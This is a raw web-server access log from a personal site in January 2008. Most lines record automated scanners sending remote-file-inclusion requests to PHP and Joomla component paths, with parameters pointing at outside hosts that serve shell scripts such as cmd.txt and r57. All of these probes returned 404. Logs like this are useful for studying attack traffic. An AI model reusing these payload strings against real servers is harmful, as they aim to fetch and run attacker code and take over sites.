89.181.61.205 - - [22/Jan/2008:10:56:35 -0800] "GET /retreat1/webcam/?D=A HTTP/1.1" 200 458363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
220.229.132.194 - - [22/Jan/2008:10:57:18 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://203.197.248.118:1971/90.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:57:27 -0800] "GET /retreat1/webcam/?A HTTP/1.1" 200 458363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:10:57:27 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:10:57:28 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:10:57:29 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:10:57:29 -0800] "GET //modules/xfsection/modify.php?dir_module=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:10:57:30 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.102.88.110 - - [22/Jan/2008:10:57:48 -0800] "GET /logs/access_071222.log/database.php?mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.110 - - [22/Jan/2008:10:57:48 -0800] "GET /logs/database.php?mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:57:53 -0800] "GET /logs/access_080102.log HTTP/1.1" 200 356516 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:57:55 -0800] "GET /minamijewelry/source_images/?N=D HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:57:56 -0800] "GET /logs/access_071224.log HTTP/1.1" 200 205925 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:57:59 -0800] "GET /logs/?N=D HTTP/1.1" 200 31254 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
62.75.177.136 - - [22/Jan/2008:10:58:10 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:58:12 -0800] "GET /minamijewelry/source_images/?A HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:58:59 -0800] "GET /retreat1/webcam/?D=D HTTP/1.1" 200 458363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:59:06 -0800] "GET /logs/access_070822.log HTTP/1.1" 200 49732 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:11:02:26 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
206.190.75.8 - - [22/Jan/2008:11:02:44 -0800] "GET / HTTP/1.1" 200 2962 "http://b8.mail.yahoo.com/ym/dmulk.com/ShowLetter?MsgId=1136_1719678_193000_1562_2099_0_1009_9836_288610822&Idx=0&YY=71388&y5beta=yes&y5beta=yes&inc=25&order=down&sort=date&pos=0&view=&head=&box=Inbox" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [22/Jan/2008:11:02:55 -0800] "GET /imperant/ HTTP/1.1" 401 395 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [22/Jan/2008:11:03:02 -0800] "GET /retreat1/ HTTP/1.1" 200 15081 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [22/Jan/2008:11:03:22 -0800] "GET /_private/ HTTP/1.1" 403 163 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [22/Jan/2008:11:03:25 -0800] "GET /bikes/ HTTP/1.1" 200 2184 "http://dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [22/Jan/2008:11:03:29 -0800] "GET /bikes/CreSTOC07/ HTTP/1.1" 200 15296 "http://dmulk.com/bikes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [22/Jan/2008:11:03:48 -0800] "GET /retreat1/webcam/ HTTP/1.1" 200 0 "http://dmulk.com/retreat1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
213.187.80.1 - - [22/Jan/2008:11:04:09 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:11:04:09 -0800] "GET //skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:11:04:10 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:11:05:01 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:11:05:47 -0800] "GET /logs/access_071221.log//convert/mvcw.php?step=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:11:05:47 -0800] "GET //convert/mvcw.php?step=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:11:05:47 -0800] "GET /logs//convert/mvcw.php?step=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [22/Jan/2008:11:05:47 -0800] "GET /logs/access_071230.log//convert/mvcw.php?step=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:11:06:43 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:11:06:43 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.52.223.25 - - [22/Jan/2008:11:07:10 -0800] "GET /logs/access_071214.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.buergerfunk-bochum.de/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.52.223.25 - - [22/Jan/2008:11:07:10 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.buergerfunk-bochum.de/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.52.223.25 - - [22/Jan/2008:11:07:11 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.buergerfunk-bochum.de/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:11:09:07 -0800] "GET /logs/access_071221.log//convert/mvcw.php?step=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:11:09:07 -0800] "GET //convert/mvcw.php?step=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:11:09:08 -0800] "GET /logs//convert/mvcw.php?step=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:11:09:29 -0800] "GET /logs/access_071230.log//convert/mvcw.php?step=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:11:11:21 -0800] "GET /logs/access_071229.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:11:11:54 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:11:12:10 -0800] "GET //skin/zero_vote/error.php?dir=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.28 - - [22/Jan/2008:11:12:34 -0800] "GET /minamijewelry/source_images/?N=D HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.69.222.121 - - [22/Jan/2008:11:12:57 -0800] "GET /logs/access_071205.log//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:11:12:59 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:11:12:59 -0800] "GET //skin/zero_vote/error.php?dir=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:11:13:00 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.45.253 - - [22/Jan/2008:11:13:44 -0800] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://direma.at/administrator/modules/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.45.253 - - [22/Jan/2008:11:13:45 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://direma.at/administrator/modules/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.45.253 - - [22/Jan/2008:11:13:45 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://direma.at/administrator/modules/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.12 - - [22/Jan/2008:11:16:53 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.fuori-corso.net/administration/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.212 - - [22/Jan/2008:11:17:47 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:11:18:49 -0800] "GET //convert/mvcw.php?step=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [22/Jan/2008:11:19:10 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cap-it.us/rmr/webcal//tools/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.148.190.111 - - [22/Jan/2008:11:21:32 -0800] "GET /logs/access_071221.log//convert/mvcw.php?step=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.148.190.111 - - [22/Jan/2008:11:21:32 -0800] "GET //convert/mvcw.php?step=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.148.190.111 - - [22/Jan/2008:11:21:32 -0800] "GET /logs//convert/mvcw.php?step=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.96.196.195 - - [22/Jan/2008:11:22:32 -0800] "GET /funny/ HTTP/1.1" 200 808 "http://www.google.com/search?q=index+of+funny&hl=en&start=20&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:11:22:41 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:11:22:41 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:11:22:42 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.148.190.111 - - [22/Jan/2008:11:23:13 -0800] "GET /logs/access_071230.log//convert/mvcw.php?step=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:11:23:18 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:11:23:18 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.30.169.80 - - [22/Jan/2008:11:24:15 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cap-it.us/rmr/webcal//tools/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [22/Jan/2008:11:24:15 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cap-it.us/rmr/webcal//tools/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:11:24:45 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:11:24:45 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.30.169.80 - - [22/Jan/2008:11:25:44 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cap-it.us/rmr/webcal//tools/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.149.32.14 - - [22/Jan/2008:11:26:12 -0800] "GET /logs/access_071221.log//convert/mvcw.php?step=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.149.32.14 - - [22/Jan/2008:11:26:13 -0800] "GET //convert/mvcw.php?step=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.149.32.14 - - [22/Jan/2008:11:26:14 -0800] "GET /logs//convert/mvcw.php?step=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.149.32.14 - - [22/Jan/2008:11:26:18 -0800] "GET /logs/access_071230.log//convert/mvcw.php?step=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.204.234 - - [22/Jan/2008:11:27:59 -0800] "GET //convert/mvcw.php?step=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:11:28:06 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:11:28:13 -0800] "GET //convert/mvcw.php?step=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.150.241 - - [22/Jan/2008:11:29:17 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.ssb-hamm.de//img/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
85.25.150.241 - - [22/Jan/2008:11:29:18 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.ssb-hamm.de//img/contr.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:11:31:42 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:11:31:43 -0800] "GET //skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:11:31:43 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:11:31:57 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:11:32:40 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.138.76 - - [22/Jan/2008:11:32:49 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.138.76 - - [22/Jan/2008:11:32:49 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.138.76 - - [22/Jan/2008:11:32:49 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:11:33:48 -0800] "GET /logs/access_071221.log//convert/mvcw.php?step=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:11:33:48 -0800] "GET /logs//convert/mvcw.php?step=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.240.89 - - [22/Jan/2008:11:34:04 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:11:34:38 -0800] "GET /logs/access_080101.log/akocomments.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:11:34:38 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:11:34:39 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.138.76 - - [22/Jan/2008:11:35:16 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.138.76 - - [22/Jan/2008:11:35:16 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.138.76 - - [22/Jan/2008:11:35:16 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:11:35:40 -0800] "GET /logs/access_071230.log//convert/mvcw.php?step=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [22/Jan/2008:11:38:01 -0800] "GET //convert/mvcw.php?step=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.226.76.97 - - [22/Jan/2008:11:39:05 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.19.148 - - [22/Jan/2008:11:39:33 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:11:45:16 -0800] "GET /logs/access_071221.log//convert/mvcw.php?step=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:11:45:16 -0800] "GET /logs//convert/mvcw.php?step=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:11:45:19 -0800] "GET /logs/access_071230.log//convert/mvcw.php?step=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:11:45:34 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:11:45:35 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:11:45:35 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:11:48:30 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:11:48:31 -0800] "GET //skin/zero_vote/error.php?dir=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.205.186.244 - - [22/Jan/2008:11:48:31 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.pubmailing.com/r57?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.43 - - [22/Jan/2008:11:48:42 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.43 - - [22/Jan/2008:11:48:47 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.43 - - [22/Jan/2008:11:48:53 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.148.190.111 - - [22/Jan/2008:11:49:06 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.148.190.111 - - [22/Jan/2008:11:49:07 -0800] "GET //skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.148.190.111 - - [22/Jan/2008:11:49:07 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.208.81.132 - - [22/Jan/2008:11:50:03 -0800] "GET //skin/zero_vote/error.php?dir=http://www.naimaa.com/templates/r00t/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
